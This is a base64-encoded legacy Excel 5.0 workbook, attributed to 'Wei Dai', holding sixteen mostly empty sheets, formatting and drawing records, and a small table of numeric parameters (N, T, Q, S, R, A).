////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
///////////////////////9/////v////7///8EAAAA/v///wYAAAAHAAAA
EAAAAAkAAAAKAAAACwAAAAwAAAANAAAADgAAAA8AAAAFAAAA/v///xIAAAD+
/////////xUAAAAWAAAAFwAAABgAAAAZAAAAGgAAABsAAAARAAAA////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
/////////////////////////////////////////////1IAbwBvAHQAIABF
AG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAWAAUA//////////8CAAAAEAgCAAAAAADAAAAAAAAARgAAAAAA
AAAAAAAAAIYWiI67y7kBAwAAAIAAAAAAAAAAQgBvAG8AawAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAoAAgD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAIAAAAhBYAAAAAAAABAEMAbwBtAHAATwBiAGoAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgACAQEA
AAADAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAABeAAAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQA
aQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIA////////////
////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAJAS
AAAAAAAAAQAAAP7/////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
//////////////////////////////8BAP7/AwoAAP////8QCAIAAAAAAMAA
AAAAAABGHgAAAE1pY3Jvc29mdCBFeGNlbCA1LjAgV29ya3NoZWV0AAYAAABC
aWZmNQAOAAAARXhjZWwuU2hlZXQuNQAAAAAAAAA7AAMA/v8JAAYAAAAAAAAA
AAAAAAEAAAABAAAAAAAAAP7/AAADCgAA4IWf8vlPaBCrkQgAKyez2QEAAADg
hZ/y+U9oEKuRCAArJ7PZMAAAAGQSAAAIAAAAEQAAAEgAAAACAAAAABIAAAMA
AAAMEgAABAAAABgSAAAFAAAAKBIAAAYAAAA0EgAAEgAAAEASAAATAAAAWBIA
AEcAAACwEQAA/////wMAAAAIAFodRhJ+DwEACQAAA8UIAAALAAUCAAAAAAUA
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
AAAAhAACAAAAoQAiAAAAAQABAAEAAQAEAAAAAHMAAAAAAADgPwAAAAAAAOA/
AERVAAIACAAAAgoAAAAAAAAAAAEAAD4CCgC2AAAAAAAAAAAAHQAPAAMAAAAA
AAABAAAAAAAAAAoAAAAJCAgAAAUQAAcJyQcLAgwAAAAAAAAAAABTFQAADQAC
AAEADAACAGQADwACAAEAEQACAAAAEAAIAPyp8dJNYlA/XwACAAEAKgACAAAA
KwACAAEAggACAAAAgAAIAAAAAAAAAAAAJQIEAAAACAGMAAQAAQABAIEAAgDB
BBQAAwACJkEVAAgAB1BhZ2UgJlCDAAIAAACEAAIAAAChACIAAAABAAEAAQAB
AAQAAAAAcwAAAAAAAOA/AAAAAAAA4D8ARFUAAgAIAAACCgAAAAAAAAAAAQAA
PgIKALYAAAAAAAAAAAAdAA8AAwAAAAAAAAEAAAAAAAAACgAAAAkICAAABRAA
BwnJBwsCDAAAAAAAAAAAAEsWAAANAAIAAQAMAAIAZAAPAAIAAQARAAIAAAAQ
AAgA/Knx0k1iUD9fAAIAAQAqAAIAAAArAAIAAQCCAAIAAACAAAgAAAAAAAAA
AAAlAgQAAAAIAYwABAABAAEACQgIAAAFBQAHCckH4QAAAMEAAgAAAL8AAADA
AAAA4gAAAFwAIAAHV2VpIERhaSAgICAgICAgICAgICAgICAgICAgICAgIEIA
AgDkBJwAAgAOABkAAgAAABIAAgAAABMAAgAAAD0AEgAAAEgA3C9UGzgAAAAA
AAEAWAJAAAIAAACNAAIAAAAiAAIAAAAOAAIAAQDaAAIAAAAxABQAyAAAAP9/
kAEAAAAAAAAFQXJpYWwxABQAyAABAP9/vAIAAAAAAAAFQXJpYWwxABQAyAAC
AP9/kAEAAAAAAAAFQXJpYWwxABQAyAADAP9/vAIAAAAAAAAFQXJpYWwxABQA
yAAAAP9/kAEAAAAAAAAFQXJpYWweBBoABQAXIiQiIywjIzBfKTtcKCIkIiMs
IyMwXCkeBB8ABgAcIiQiIywjIzBfKTtbUmVkXVwoIiQiIywjIzBcKR4EIAAH
AB0iJCIjLCMjMC4wMF8pO1woIiQiIywjIzAuMDBcKR4EJQAIACIiJCIjLCMj
MC4wMF8pO1tSZWRdXCgiJCIjLCMjMC4wMFwpHgQ1ACoAMl8oIiQiKiAjLCMj
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
AAUQAAcJyQcLAgwAAAAAAAAAAAB7EAAADQACAAEADAACAGQADwACAAEAEQAC
AAAAEAAIAPyp8dJNYlA/XwACAIEAAgDBBBQAAwACJkEVAAgAB1BhZ2UgJlCD
AAIAAACEAAIAAAChACIAAAABAAEAAQABAAQAAAAAcwAAAAAAAOA/AAAAAAAA
4D8ARFUAAgAIAAACCgAAAAAAAAAAAQAAPgIKALYAAAAAAAAAAAAdAA8AAwAA
AAAAAAEAAAAAAAAACgAAANDPEeChsRrhAAAAAAAAAAAAAAAAAAAAADsAAwD+
/wkABgAAAAAAAAAAAAAAAQAAAAEAAAAAAAAAABAAAAIAAAABAAAA/v///wAA
AAAAAAAA////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////CQAAADIKGQAm
AAEAAABOAAsAEgAAADIKGQCAAAcAAAAxMDAwMDAwAAkACQAJAAkACQAJAAkA
CQAAADIKLwAmAAEAAABUAAkADAAAADIKLwCkAAMAAAAzMDAACQAJAAkACQAA
ADIKRQAmAAEAAABRAAwADQAAADIKRQCfAAQAAAAwLjI1CQAFAAkACQAJAAAA
MgpbACYAAQAAAFMACwAMAAAAMgpbAKgAAwAAADAuNQAJAAUACQAJAAAAMgpx
ACYAAQAAAFIACwAMAAAAMgpxAKgAAwAAADAuNQAJAAUACQAKAAAAMgqdACYA
AgAAAEE9CwAKABMAAAAyCp0AewAIAAAAMS4yMTU2NjMJAAUACQAJAAkACQAJ
AAkABAAAAC0BCAAEAAAAJwH//wMAAAAeAAQAAAAtAQkABQAAAAEC////AAUA
AAAJAgAAAAAHAAAAFgTdAGMBAAAAAAcAAAD8AgAAAAAAAP//BAAAAC0BCgAE
AAAABAENAAQAAAACAQIABAAAAPABAgAIAAAA+gIAAAAAAAAAAAAABAAAAC0B
AgAFAAAAFAIAAAAABQAAABMCAABjAQQAAAAtAQMACQAAAB0GIQDwAAEAYwEA
AAAABAAAAC0BAgAFAAAAFAIAAAAABQAAABMC3QAAAAQAAAAtAQMACQAAAB0G
IQDwAN0AAQAAAAAABAAAAC0BAQAEAAAAJwH//wMAAAAAAAcHBwcHBwcHBwcH
BwcHBwcHBwcHBwceAAAAAQAAAACFn/IeAAAAAQAAAACFn/IeAAAACAAAAFdl
aSBEYWkAHgAAAAEAAAAAZWkgHgAAAAEAAAAAZWkgHgAAABAAAABNaWNyb3Nv
ZnQgRXhjZWwAAwAAAAAAAADQzxHgobEa4QAAAAAAAAAAAAAAAAAAAAA7AAMA
/v8JAAYAAAAAAAAAAAAAAAEAAAABAAAAAAAAAAAQAAACAAAAAQAAAP7///8A
AAAAAAAAAP//////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
/////////////////////////////////wQAAAAtAQIABQAAABQC3AAAAAUA
AAATAtwAIwAEAAAALQEDAAkAAAAdBiEA8AABACMA3AAAAAQAAAAtAQIABQAA
ABQCFgAAAAUAAAATAhYAYwEEAAAALQEDAAkAAAAdBiEA8AABAGMBFgAAAAQA
AAAtAQIABQAAABQCAAByAAUA0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAOwAD
AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////
AAAAAAAAAAD/////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////v8A
AAMKAADghZ/y+U9oEKuRCAArJ7PZAQAAAOCFn/L5T2gQq5EIACsns9kwAAAA
ZBIAAAgAAAARAAAASAAAAAIAAAAAEgAAAwAAAAwSAAAEAAAAGBIAAAUAAAAo
EgAABgAAADQSAAASAAAAQBIAABMAAABYEgAARwAAALARAAD/////AwAAAAgA
Wh1GEn4PAQAJAAADxQgAAAsABQIAAAAABQAAAAkCAAAAAAUAAAABAv///wAE
AAAABAENAAQAAAACAQIABQAAAAwC3QBjAQMAAAAeAAUCAAD3AAADAAEAAAAA
gAAAAACAAACAgAAAAACAAIAAgAAAgIAAwMDAAMDcwACkyPAAgAAABACAAASA
gAAEAACABIAAgAQAgIAEgICABICA/wSAIGAE///ABKDg4ARgAIAE/4CABACA
wATAwP8EAM//BGn//wTg/+AE3ZyzBLOP7gQqb/kEP7jNBEiENgSVjEEEjl5C
BKBiegRiT6wEHS++BChmdgQARQAERT4BBGooEwSFOWoESjKFBAQEBAQICAgE
DAwMBBEREQQWFhYEHBwcBCIiIgQpKSkEMDAwBF9fXwRVVVUETU1NBEJCQgQ5
OTkEAAcABA0AAAS3mYEEhJm0BL29kAR/f2AEYGB/BAAOAAQbAAAEKAAABAgJ
KwQAHQAEOQAABAAAmwQAJQAESQAABBEROwQALwAEXQAABBcXRQQAOgAESRER
BBwcUwQAFv8EKwD/BCEhbARZFBQEAFEABEcaagQZMmcEAGEABAAx/wRhAP8E
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
